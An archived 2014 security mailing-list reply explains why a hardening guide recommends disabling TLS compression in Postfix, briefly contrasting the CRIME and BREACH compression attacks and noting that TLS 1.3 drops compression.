[Ach] NO_COMPRESSION on postfix
Aaron Zauner
azet at azet.org
Thu Dec 18 12:55:00 CET 2014
* Tim <tim at bastelfreak.de> [141218 10:27]:
> Hi guys,
>
> you recommend "tls_ssl_options = NO_COMPRESSION" on postfix, can you
> tell my why compression is a bad idea? I'm familiar with
> https://en.wikipedia.org/wiki/CRIME but this seems to only apply on http?
Very good question.
The BREACH attack works specifically on HTTP compression. CRIME
applies to TLS compression in genereal. That being said CRIME won't
work against SMTP. It might work against other protocols, I remember
playing a Capture The Flag two years ago where they implemented
their own (non-HTTP) protocol that was vulnerable to CRIME:
http://broot.ca/plaidctf-compression-crypto-250
Anyway. It is common practice nowadays to disable TLS compression
alltogether. TLS compression will also not be available in the new
TLS standard (1.3) due to these concerns regarding compression
attacks.
So: It's really up to you, but our guide will still recommend
turning it off.
Aaron
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 801 bytes
Desc: Digital signature
URL: <http://lists.cert.at/pipermail/ach/attachments/20141218/7ae3e422/attachment.sig>
More information about the Ach
mailing list